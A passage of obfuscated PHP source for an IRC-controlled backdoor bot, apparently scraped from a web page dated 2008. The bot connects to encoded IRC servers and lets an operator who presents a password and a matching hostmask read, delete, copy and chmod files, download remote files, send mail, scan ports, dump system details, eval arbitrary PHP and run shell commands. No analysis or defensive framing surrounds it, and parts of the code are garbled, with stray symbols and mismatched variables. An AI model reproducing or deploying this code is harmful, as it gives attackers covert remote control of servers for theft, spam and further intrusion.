	  'sqywiZKPpVeMipjHlm6RiZU=', 'sqytlpaKo5eMipjHlm6RiZU=');

  shuffle($v5);
  if(($v6 = fsockopen(f4($v5[0]), $v1['po'], $v7, $v8, 15)))
    {

      $v9 = f6($v1['mrnd']);
      if(strlen($v1['sp']) > 0)
	{
	  f7($v6, f2(b64('PASS'))." ".f4($v1['sp']));

	}
      f7($v6,
	 f2(b64('USER'))." ".f8($v1['mrnd'])." 127.0.0.1 localhost :$v9");

      f7($v6, f2(b64('NICK'))." $v9");
      while(!feof($v6))
	{

	  $v9 = trim(fgets($v6, 512));
	  $v10 = explode(" ", $v9);

	  if(($v9 == $v4))
	    continue;
	  if(isset($v10[0]) && $v10[0] == f2(b64('PING')))
	    {

	      f7($v6, f2(b64('PONG'))." ".$v10[1]);
	    }
	  else if(isset($v10[1]) && $v10[1] == f2(b64('001')))
	    {

	      f7($v6, f2(b64('MODE'))." $v9 ".f4($v1['mo']));

	      f7($v6, f2(b64('JOIN'))." ".f4($v1['ch'])." ".f4($v1['ke']));

	    }
	  %
	  else if(isset($v11[1]) && $v11[1] == f2(b64('433')))
	    {
	      f7($v6, f2(b64('NICK'))." $v9");

	    }
	  else if(isset($v10[1]) && isset($v3[$v10[1]]))
	    {
	      unset($v3[$v10[1]]);

	    }
	  else if(isset($v10[1])
		  &&($v10[1] == f2(b64('PRIVMSG')) || $v10[1] == "332"))
	    {

	      $v12 = strstr($v9, " :");
	      $v12 = substr($v12, 2);
	      $v11 = explode(" ", $v12);

	      $v13 = $v10[0];
	      $v14 = explode("!", $v13);
	      $v14 = substr($v14[0], 1);

	      %$v15 = FALSE;
	      if($v11[0] == "\1".f2(b64('VERSION'))."\1")
		{
		  f7($v6,
		     "NOTICE ".$v14." :\1".
		     f2(b64('VERSION'))." ".f4($v1['ve'])."\1");

		}
	      for($i1 = 0; $i1 < count($v11); $i1++)
		{
		  if($v11[$i1] == "-s")
		    {

		      $v15 = TRUE;
		    }
		}
	      if($v10[1] == "332")
		{
		  $v16 = $v10[3];

		}
	      else if($v10[2] == $v9)
		{
		  $v16 = $v14;
		}
	      else
		{
		  $v16 = $v10[2];

		}
	      if($v11[0] == PHP_OS)
		{
		  array_shift($v11);
		}
	      if(substr($v11[0], 0, 1) == $v1['tr'])
		{

		  if(isset($v3[$v13]) || $v10[1] == "332")
		    {
		      switch(substr($v11[0], 1))
			{

			case f10("sKM="):
			  if($v10[1] != "332")
			    {
			      $v3[$v13] = FALSE;

			      f11($v6, $v15, $v16, htmen(b64('out')));
			    }
			  break;
			case f10('qGWaoKKb'):

			  f7($v6, f2(b64('QUIT :I QUIT')));
			  fclose($v6);
			  exit(0);

			  break;
			case f10('tpWs'):
			  if(count($v11) > 1)
			    {
			      f7($v6, substr($v12, strlen($v11[0])));

			    }
			  break;
			case f10("sKc="):
			  if(isset($v11[1]))
			    {
			      $v17 = $v11[1];

			    }
			  else
			    {
			      $v17 = getcwd();
			    }
			  if(is_dir($v17))
			    {
			      if(($o1 = opendir($v17)))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Dir// Now listing:')).
				      " \2".$v17."\2");

				  while(($k1 = readdir($o1)) !== FALSE)
				    {
				      if($k1 != "." && $k1 != "..")
					{

					  f11($v6,
					      $v15,
					      $v16,
					      ">(".
					      filetype
					      ($v17."/".$k1).") $k1");

					  sleep(1);
					}
				    }
				  closedir();
				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Dir// Unable to list contents of')).
				      " \2".$v17."\2");

				}
			    }
			  else
			    {
			      f11($v6,
				  $v15,
				  $v16,
				  f2(b64('Dir//')).
				  " \2".$v17."\2 ".
				  f2(b64('is not a dir!')));

			    }
			  break;
			case f10('p5Wp'):
			  if(count($v11) > 1)
			    {
			      if(is_file($v11[1]))
				{

				  if(($k2 = fopen($v11[1], "r")))
				    {
				      f11($v6,
					  $v15,
					  $v16,
					  f2
					  (b64('CAT// Now reading file:')).
					  " \2".$v11[1]."\2");

				      while(!feof($k2))
					{
					  $m1 = trim(fgets($k2, 256));
					  f11($v6, $v15, $v16, "> $m1");

					  sleep(1);
					}
				      f11($v6, $v15, $v16, "> [EOF]");
				    }
				  else
				    {
				      f11($v6,
					  $v15,
					  $v16,
					  f2
					  (b64('CAT// Couldn't open')).
					  " \2".$v11[1]."\2 for reading.");

				    }
				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2(b64('CAT//')).
				      " \2".$v11[1].
				      "\2 ".f2(b64('is not a file')));

				}
			    }
			  break;
			case f10('tKuZ'):
			  f11($v6, $v15,
			      $v16,
			      f2(b64('PWD// Current dir:'))." ".getcwd());

			  break;
			case f10("p5g="):
			  if(count($v11) > 1)
			    {
			      if(chdir($v11[1]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('CD// Changed dir to')).
				      " ".$v11[1]);

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('CD// Failed to change dir')));

				}
			    }
			  break;
			case f10("tqE="):
			  if(count($v11) > 1)
			    {
			      if(unlink($v11[1]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('RM// Deleted'))." \2".
				      $v11[1]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('RM// Failed to delete')).
				      " \2".$v11[1]."\2");

				}
			    }
			  break;
			case f10('uKOqlZs='):
			  if(count($v11) > 1)
			    {
			      if(touch($v11[1]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Touch// Touched')).
				      " \2".$v11[1]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Touch// Failed to touch')).
				      " \2".$v11[1]."\2");

				}
			    }
			  break;
			case f10('t62inpySoA=='):
			  if(count($v11) > 2)
			    {
			      if(symlink($v11[1], $v11[2]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('SymLink// Symlinked')).
				      " \2".$v11[2]."\2 To \2".$v11[1]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('SymLink// Failed to link')).
				      " \2".$v11[2]."\2 To \2".$v11[1]."\2");

				}
			    }
			  break;
			case f10('p5ykqaE='):
			  if(count($v11) > 2)
			    {
			      if(chown($v11[1], $v11[2]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Chown// Chowned')).
				      " \2".$v11[1]."\2 To \2".$v11[2]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Chown// Failed to chown')).
				      " \2".$v11[1]."\2 To \2".$v11[2]."\2");

				}
			    }
			  break;
			case f10('p5yioZc='):
			  if(count($v11) > 2)
			    {
			      if(chmod($v11[1], $v11[2]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Chmod// Chmodded')).
				      " \2".$v11[1].
				      "\2 with permissions \2".$v11[2]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Chmod// Failed to chmod')).
				      " \2".$v11[1]."\2");

				}
			    }
			  break;
			case f10('sZ+Zm6U='):
			  if(count($v11) > 1)
			    {
			      if(mkdir($v11[1]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('MKDir// Created directory')).
				      " \2".$v11[1]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('MKDir// Failed to create directory')).
				      " \2".$v11[1]."\2");

				}
			    }
			  break;
			case f10('tqGZm6U='):
			  if(count($v11) > 1)
			    {
			      if(rmdir($v11[1]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('RMDir// Removed directory')).
				      " \2".$v11[1]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('RMDir// Failed to remove directory')).
				      " \2".$v11[1]."\2");

				}
			    }
			  break;
			case f10("p6Q="):
			  if(count($v11) > 2)
			    {
			      if(copy($v11[1], $v11[2]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('CP// Copied'))." \2".
				      $v11[1]."\2 to \2".$v11[2]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('CP// Failed to copy')).
				      " \2".$v11[1]."\2 to \2".$v11[2]."\2");

				}
			    }
			  break;
			case f10('sZWeng=='):
			  if(count($v11) > 4)
			    {
			      $p099fb995346f3 = "From: <".$v11[2].">\r\n";

			      if(mail
				 ($v11[1], $v11[3],
				  substr($v12, $v11[4]), $p099fb995346f3))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Mail//')).
				      " Message sent to \2".$v11[1]."\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16, f2(b64('Mail//'))." Send failure");

				}
			    }
			  break;
			case f10('sZ+ilmg='):
			  f11($v6, $v15,
			      $v16, f2(b64('MD5//'))." ".md5($v11[1]));

			  break;
			case f10('qKKo'):
			  if(isset($v11[1]))
			    {
			      $m3 = explode(".", $v11[1]);

			      if(count($m3) == 4
				 && is_numeric($m3[0])
				 && is_numeric($m3[1])
				 && is_numeric($m3[2])
				 && is_numeric($m3[3]))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('DNS//'))." ".
				      $v11[1]." -> ".
				      gethostbyaddr($v11[1]));

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      f2(b64('DNS//')).
				      " ".$v11[1].
				      " -> ".gethostbyname($v11[1]));

				}
			    }
			  break;
			case f10('tpmoppSWqQ=='):
			  f7($v6, f2(b64('QUIT :QUIT...')));

			  fclose($v6);
			  f3();
			  break;
			case f10("tqI="):
			  if(isset($v11[1]))
			    {

			      $v9 = f6((int) $v11[1]);
			      f7($v6, f2(b64('NICK'))." $v9");

			    }
			  else
			    {
			      $v9 = f6($v1['mrnd']);
			      f7($v6, f2(b64('NICK'))." $v9");

			    }
			  break;
			case f10('tJyl'):
			  if(count($v11) > 1)
			    {
			      eval(substr($v12, strlen($v11[0])));

			    }
			  break;
			case f10('q5mp'):
			  if(count($v11) > 2)
			    {
			      if(!($k2 = fopen($v11[2], "w")))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      f2
				      (b64('Get// Permission denied')));

				}
			      else
				{
				  if(!($e2 = file($v11[1])))
				    {
				      f11($v6,
					  $v15,
					  $v16,
					  f2
					  (b64('Get// Bad URL/DNS error')));

				    }
				  else
				    {
				      for($i1 = 0; $i1 < count($e2); $i1++)
					{
					  fwrite($k2, $e2[$i1]);

					}
				      f11($v6,
					  $v15,
					  $v16,
					  f2
					  (b64('Get//'))." \2".
					  $v11[1].
					  "\2 downloaded to \2".
					  $v11[2]."\2");

				    }
				  fclose($k2);
				}
			    }
			  break;
			case f10("sp0="):
			  f11($v6, $v15,
			      $v16,
			      f2(b64('NetInfo//')).
			      " IP: ".$_SERVER['SERVER_ADDR'].
			      " Hostname: ".$_SERVER['SERVER_NAME']);

			  break;
			case f10("t50="):
			  f11($v6, $v15,
			      $v16,
			      f2(b64('Sysinfo//')).
			      " [User: ".get_current_user().
			      "] [PID: ".getmypid().
			      "] [Version: PHP ".phpversion().
			      "] [OS: ".PHP_OS.
			      "] [Server_software: ".
			      $_SERVER['SERVER_SOFTWARE'].
			      "] [Server_name: ".
			      $_SERVER['SERVER_NAME'].
			      "] [Admin: ".
			      $_SERVER['SERVER_ADMIN'].
			      "] [Docroot: ".
			      $_SERVER['DOCUMENT_ROOT'].
			      "] [HTTP Host: ".
			      $_SERVER['HTTP_HOST']."] [URL: ".
			      $_SERVER['REQUEST_URI']."]");

			  break;
			case f10('tKOnpqKUmuw='):
			  if(isset($v11[1], $v11[2]))
			    {
			      if(fsockopen
				 ($v11[1],(int) $v11[2], $t1, $v2, 5))
				{

				  f11($v6,
				      $v15,
				      $v16,
				      "".
				      f2
				      (b64('PortChk//'))." ".
				      $v11[1].":".$v11[2]." is \2Open\2");

				}
			      else
				{
				  f11($v6,
				      $v15,
				      $v16,
				      "".
				      f2
				      (b64('PortChk//'))." ".
				      $v11[1].":".$v11[2]." is \2Closed\2");

				}
			    }
			  break;
			case f10('uaKWn5g='):
			  f11($v6, $v15,
			      $v16, f2(b64('Uname//'))." ".php_uname());

			  break;
			case f10("rZg="):
			  f11($v6, $v15,
			      $v16, f2(b64('ID//'))." ".getmypid());

			  break;
			case f10('p6GZ'):
			  if(count($v11) > 1)
			    {
			      $p1dccadfed7bcb =
				popen(substr($v12, strlen($v11[0])), "r");

			      while(!feof($p1))
				{
				  $k4 = trim(fgets($p1, 512));
				  if(strlen($k4) > 0)
				    {

				      f11($v6, $v15, $v16, "> ".$k4);
				      sleep(1);
				    }

				}
			      f11($v6, $v15, $v16, f2(b64('> [EOF]')));

			    }
			  break;
			case f10('qayalaiYmg=='):
			  f14(substr($v12, strlen($v11[0])));

			  break;
			}
		    }
		  else
		    {
		      switch(substr($v11[0], 1))
			{
			case f10("bg=="):
			  if(isset($v11[1])
			     && md5($v11[1]) ==
			     f4($v1['pa'])
			     && preg_match(f4($v1['ha']), $v13))
			    {

			      f11($v6, $v15, $v16, f2(b64('Ready// Ok')));

			      $v3[$v13] = TRUE;
			    }
			  else
			    {
			      f11($v6, FALSE,
				  f4($v1
				     ['ch']),
				  f2(b64('Ready// rejected')));

			    }
			  break;
			}
		    }
		}
	    }
	  $v4 = $v9;
	}
      fclose($v6);
      sleep(3);
      f3();

    }
  else
    {
      shuffle($v5);
      f3();
    }
}

function
f7($s2, $v12)
{

  fwrite($s2, "$v12\r\n");
}

function
f11($s2, $v15, $v16, $v12)
{

  if($v15 != TRUE)
    {
      f7($s2, f2(b64('PRIVMSG'))." $v16 :$v12");

    }
}

function
f10($y1)
{
  $l2 = '';
  $y1 = base64_decode($y1);

  for($i1 = 0; $i1 < strlen($y1); $i1++)
    {
      $r4 = substr($y1, $i1, 1);

      $x4 =
	substr(f2
	       (b64('4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D')),
	       ($i1 %
		strlen(f2
		       (b64('4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D'))))
	       - 1, 1);

      $r4 = chr(ord($r4) - ord($x4));
      $l2. = $r4;

    }
  return $l2;
}

function
f6($w5)
{
  for($i1 = 0; $i1 < $w5; $i1++)

    $t6. = chr(mt_rand(0, 25) + 97);
  if(posix_getegid() == 0)
    $t6 = "r-".$t6;

  return $t6;
}

function
f14($n1)
{
  $y3 = '';
  if(!empty($n1))


    {
      if(function_exists('exec'))
	{
	  @exec($n1, $y3);
	  $y3 = join("\n", $y3);

	}
      else if(function_exists('shell_exec'))
	{
	  $y3 = @shell_exec($n1);
	}
      else if(function_exists('system'))
	{
	  @ob_start();
	  @system($n1);
	  $y3 = @ob_get_contents();
	  @ob_end_clean();
	}

      else if(function_exists('passthru'))
	{
	  @ob_start();
	  @passthru($n1);
	  $y3 = @ob_get_contents();

	  @ob_end_clean();
	}
      else if(@is_resource($k8 = @popen($n1, "r")))
	{
	  $y3 = "";

	  while(!@feof($k8))
	    {
	      $y3. = @fread($k8, 1024);
	    }
	  @pclose($k8);

	}
    }
  return $y3;
}

function
f4($y1)
{
  $l1 = '';
  $y1 = base64_decode($y1);

  for($i1 = 0; $i1 < strlen($y1); $i1++)
    {
      $r1 = substr($y1, $i1, 1);

      $x1 =
	substr(f2
	       (b64('3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE')),
	       ($i1 %
		strlen(f2
		       (b64('3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE'))))
	       - 1, 1);

      $r1 = chr(ord($r1) - ord($x1));
      $l1. = $r1;

    }
  return $l1;
}

function
f8($w1)
{
  $t2 = "";
  for($i1 = 0; $i1 < $w1; $i1++)

    $t2. = chr(mt_rand(0, 25) + 97);
  return $t2;
}

// main();

?>

Laatste wijziging: 20 Mar 2008   Copyright